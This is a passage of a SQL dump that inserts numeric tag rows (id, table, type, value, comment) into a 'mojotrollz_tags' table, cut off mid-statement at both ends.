(5647, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5648, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5648, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5648, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5649, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5649, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5649, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5650, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5650, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5650, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5651, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5651, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5651, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5651, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5651, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5652, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5652, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5652, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5652, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5652, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5653, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5653, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5654, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5654, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5655, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5655, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5656, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5656, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5657, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5657, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5658, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5658, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5659, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5659, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5660, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5660, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5661, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5661, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5662, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5662, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5663, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5663, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5664, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5664, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5665, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5665, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5666, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5667, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5667, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5668, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5668, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5668, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5668, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5668, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5669, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5669, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5669, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5669, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5669, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5670, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5670, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5670, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5670, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5670, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5674, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5674, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5675, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5675, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5675, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5675, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5675, 1, 31, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5675, 1, 32, 5, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5675, 1, 33, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5675, 1, 35, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5676, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5677, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5679, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5679, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5680, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5680, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5681, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5681, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5682, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5682, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5683, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5683, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5685, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5685, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5686, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5686, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5687, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5687, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5688, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5688, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5690, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5690, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5691, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5692, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5693, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5693, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5693, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5693, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5693, 1, 32, 5, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5693, 1, 33, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5693, 1, 35, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5694, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5694, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5695, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5695, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5696, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5696, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5696, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5696, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5696, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5697, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5697, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5697, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5697, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5697, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5698, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5698, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5698, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5698, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5698, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5699, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5699, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5699, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5699, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5699, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5700, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5700, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5700, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5700, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5700, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5701, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5701, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5701, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5701, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5701, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5702, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5702, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5702, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5702, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5702, 1, 32, 5, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5702, 1, 35, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5703, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5703, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5703, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5703, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5704, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5704, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5704, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5704, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5705, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5705, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5705, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5705, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5706, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5706, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5706, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5706, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5706, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5707, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5707, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5707, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5707, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5707, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5708, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5708, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5708, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5709, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5709, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5709, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5710, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5710, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5710, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5711, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5711, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5711, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5712, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5712, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5712, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5713, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5713, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5713, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5714, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5714, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5714, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5715, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5715, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5715, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5716, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5716, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5716, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5717, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5717, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5717, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5718, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5718, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5719, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5719, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5719, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5720, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5721, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5722, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5722, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5722, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5723, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5724, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5724, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5725, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5725, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5726, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5726, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5726, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5726, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5726, 1, 31, 2, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5726, 1, 32, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5727, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5728, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5729, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5729, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5729, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5729, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5729, 1, 31, 2, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5729, 1, 35, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5730, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5730, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5730, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5730, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5730, 1, 31, 2, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5730, 1, 32, 5, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5730, 1, 35, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5731, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5731, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5731, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5731, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5731, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5732, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5732, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5732, 1, 4, 1, NULL); INSERT INTO 